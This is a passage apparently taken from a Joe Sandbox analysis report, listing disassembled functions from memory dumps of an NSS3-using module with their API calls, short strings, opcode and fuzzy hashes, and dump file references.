                                                                                                                                                                                                                                                      • Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                                                                                                      • Instruction ID: fea8f28a91cbcc80369498e61fa346335c3f96cf3b41b0e902ebc707644a4332
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4911D6B5E042015BF700EA659C30F9A7265AFA525DF16023CE809CBB40FF62F91582D2
                                                                                                                                                                                                                                                      Function 6C58CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C58D086
                                                                                                                                                                                                                                                      • PR_Malloc.NSS3(00000001), ref: 6C58D0B9
                                                                                                                                                                                                                                                      • PR_Free.NSS3(?), ref: 6C58D138
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FreeMallocstrlen
                                                                                                                                                                                                                                                      • String ID: >
                                                                                                                                                                                                                                                      • API String ID: 1782319670-325317158
                                                                                                                                                                                                                                                      • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                      • Instruction ID: cef62ab82082335475fddaa55c317535556363524ee540be9272ef891a267cd6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAD16972B436774BFB14987D8CA13EA77D38B82374F58032AD5618BBE5E6199843C311
                                                                                                                                                                                                                                                      Function 6C40AC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0Xl$PXl$pXl$winUnlock$winUnlockReadLock
                                                                                                                                                                                                                                                      • API String ID: 0-3763817051
                                                                                                                                                                                                                                                      • Opcode ID: 7088ccc27fe90d5873726d3a5a5a4b48720be22450160c65cc62ec0d325483da
                                                                                                                                                                                                                                                      • Instruction ID: 48ad99c0750d8f4597817bcaf4e03f55725078fa55e609bf122c209af3d47e92
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7088ccc27fe90d5873726d3a5a5a4b48720be22450160c65cc62ec0d325483da
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8717C716083409BDB14CF28DC85AAABBF5FF89314F15C62DE9499B301D730AA85CBC5
                                                                                                                                                                                                                                                      Function 6C52AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 1cecf518bafca74904de9bd96cc99bef95e56c8a8cd82f5787ec9cfd917e542c
                                                                                                                                                                                                                                                      • Instruction ID: 836ad96ea5a50c7fb4aef73dec1f33f11bb3a9e6d67852c1fda76f81721511e6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cecf518bafca74904de9bd96cc99bef95e56c8a8cd82f5787ec9cfd917e542c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BF1F671F016558FDB04CF69CC417AA77F1AB8A304F16422DC946EB780E7B8AA51CBC9
                                                                                                                                                                                                                                                      Function 6C51DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C3F5001,?,00000003,00000000), ref: 6C51DFD7
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C3F5001,?), ref: 6C51E2B7
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C3F5001,?), ref: 6C51E2DA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpymemsetstrlen
                                                                                                                                                                                                                                                      • String ID: W
                                                                                                                                                                                                                                                      • API String ID: 160209724-655174618
                                                                                                                                                                                                                                                      • Opcode ID: 8d8a25b09313a0bcd9d9c53de1a15b2119ab510cc03d27061d2e843315918798
                                                                                                                                                                                                                                                      • Instruction ID: 928a20beefbb27962e0d6a35d348482b702e9c327d5e9578a4ce0d7012e1e563
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d8a25b09313a0bcd9d9c53de1a15b2119ab510cc03d27061d2e843315918798
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4C12931A4D2558FFB04CE258C9C6AA77B2BF8A318F284569DC699BF41D7B1A801C7D0
                                                                                                                                                                                                                                                      Function 6C4E0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C4E1052
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C4E1086
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                                      • String ID: h(Nl$h(Nl
                                                                                                                                                                                                                                                      • API String ID: 1297977491-2521858428
                                                                                                                                                                                                                                                      • Opcode ID: cce3d06f8a224ccd7c9337c3bcf761ff712d92238b615a7a4621d0531935bc33
                                                                                                                                                                                                                                                      • Instruction ID: aa98a626c2bb445be70112d200948cd10a362eedee112c5164484828eb4b9570
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cce3d06f8a224ccd7c9337c3bcf761ff712d92238b615a7a4621d0531935bc33
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CA13C71B0125A9FCF08CF99C890EEEB7B6BF8C315B158169E915A7701DB35AC11CBA0
                                                                                                                                                                                                                                                      Function 6C404DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0Xl$PXl$pXl$winUnlockReadLock
                                                                                                                                                                                                                                                      • API String ID: 0-3226063409
                                                                                                                                                                                                                                                      • Opcode ID: af054575a39848dd6bf195747020576d13d322c737637f3ae840f671339e2b7a
                                                                                                                                                                                                                                                      • Instruction ID: f843182687a204203666e95003b2513f3c936c0f0dacbd241997615a7e5ab72f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af054575a39848dd6bf195747020576d13d322c737637f3ae840f671339e2b7a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25E13F70A187408FDB04DF28D885A5ABBF0FF89314F12962DE89997351E770A985CF86
                                                                                                                                                                                                                                                      Function 6C406F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
                                                                                                                                                                                                                                                      • API String ID: 0-3485574213
                                                                                                                                                                                                                                                      • Opcode ID: af372d97726ed1e5e114c16b70f6d8757a8c998c6574d7665910bb1088b05304
                                                                                                                                                                                                                                                      • Instruction ID: 844af440bcfc91da027a34ac96f9f379025b6a92f189cc433d7a0c2dd5d9b45b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af372d97726ed1e5e114c16b70f6d8757a8c998c6574d7665910bb1088b05304
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A716772F882114BEB14CB28C880F9A73A29B85314F294278CD59AFBD2D6719C4787D2
                                                                                                                                                                                                                                                      Function 6C423EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: sqlite_$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                                                                      • API String ID: 0-4221611869
                                                                                                                                                                                                                                                      • Opcode ID: 7d32483ec72bcb56158b70ed138bc8abc1cccaf968a23ae8e5e98d77eb964643
                                                                                                                                                                                                                                                      • Instruction ID: bd17d308d64e1fe294fac60b6965b5cc5a60c333e6912e86e4f2570573219a91
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d32483ec72bcb56158b70ed138bc8abc1cccaf968a23ae8e5e98d77eb964643
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54229F307491654FE714CB658462EBA7BF2DF4639AB2C6598C9E19FF42C22DEC42C780
                                                                                                                                                                                                                                                      Function 6C55BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: `
                                                                                                                                                                                                                                                      • API String ID: 0-2679148245
                                                                                                                                                                                                                                                      • Opcode ID: 63d8633aa3f0d705b2d0fc2c2041d3ecd02ce23ed30f15c510940298f9088538
                                                                                                                                                                                                                                                      • Instruction ID: b035e4fbc83b70ba6a3e93836929ead1bbcacc83f082a1469818d63af81fc6a0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63d8633aa3f0d705b2d0fc2c2041d3ecd02ce23ed30f15c510940298f9088538
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB926F74E002498FDB05DF58C890BAEB7B2FF88308F68416AD415ABB91D735EC56CB90
                                                                                                                                                                                                                                                      Function 6C3F3D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: htonl
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 2009864989-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: febb16d6851d71d2a85959a04d55bc899c68e0da9d3be6e651c0407e470bdcf7
                                                                                                                                                                                                                                                      • Instruction ID: c79d42dea9a6150444622a4377f15423e0aee05e6fa30d5ca8b3a659235a88ce
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: febb16d6851d71d2a85959a04d55bc899c68e0da9d3be6e651c0407e470bdcf7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F514B33F490798ADB95457C88603FFFBB19F92318F184B29C5B1A7AC0C23545478BA2
                                                                                                                                                                                                                                                      Function 6C49EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49F019
                                                                                                                                                                                                                                                      • PK11_GenerateRandom.NSS3(?,00000000), ref: 6C49F0F9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorGenerateK11_Random
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3009229198-0
                                                                                                                                                                                                                                                      • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                                                      • Instruction ID: 809931b612ec586eea2ccb5530e3f81d630c9c8a1c5f9de83fbd285a8c14a958
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F91A371E012268BDB14CF68C891EAEBBF1FF85324F14462DE56697BC0D730A905CB91
                                                                                                                                                                                                                                                      Function 6C4C2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C4E7929), ref: 6C4C2FAC
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C4E7929), ref: 6C4C2FE0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2619118453-0
                                                                                                                                                                                                                                                      • Opcode ID: 8b5c7d0f0ef03b8a6b17060c81cdbe4920eefee8d30fdc52c764c7c1c990b025
                                                                                                                                                                                                                                                      • Instruction ID: 34fd959a78b580e4b669fb69a48dee0d48226a71e59c818bd42528189841e04b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b5c7d0f0ef03b8a6b17060c81cdbe4920eefee8d30fdc52c764c7c1c990b025
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4151F37AB059118FD710CE5AC880FEA73B1FB4531AF254129D9099BB26CB31ED46CB83
                                                                                                                                                                                                                                                      Function 6C4CED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C4CEE3D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
